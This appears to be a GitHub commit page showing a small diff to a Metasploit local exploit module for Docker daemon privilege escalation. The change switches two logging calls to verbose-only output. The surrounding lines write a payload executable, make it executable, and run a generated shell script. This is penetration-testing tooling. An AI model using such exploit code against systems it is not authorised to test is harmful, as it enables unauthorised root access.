We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 6c11692 commit 0635feeCopy full SHA for 0635fee
modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -49,8 +49,8 @@ def exploit
49
print_status("Writing payload executable to '#{exe_file}'")
50
write_file(exe_file, pl)
51
cmd_exec("chmod +x #{exe_file}")
52
- print_status shell_script(exe_file)
53
- print_status cmd_exec("sh -c '#{shell_script(exe_file)}'")
+ vprint_status shell_script(exe_file)
+ vprint_status cmd_exec("sh -c '#{shell_script(exe_file)}'")
54
55
stime = Time.now.to_f
56
print_status "Starting the payload handler..."
0 commit comments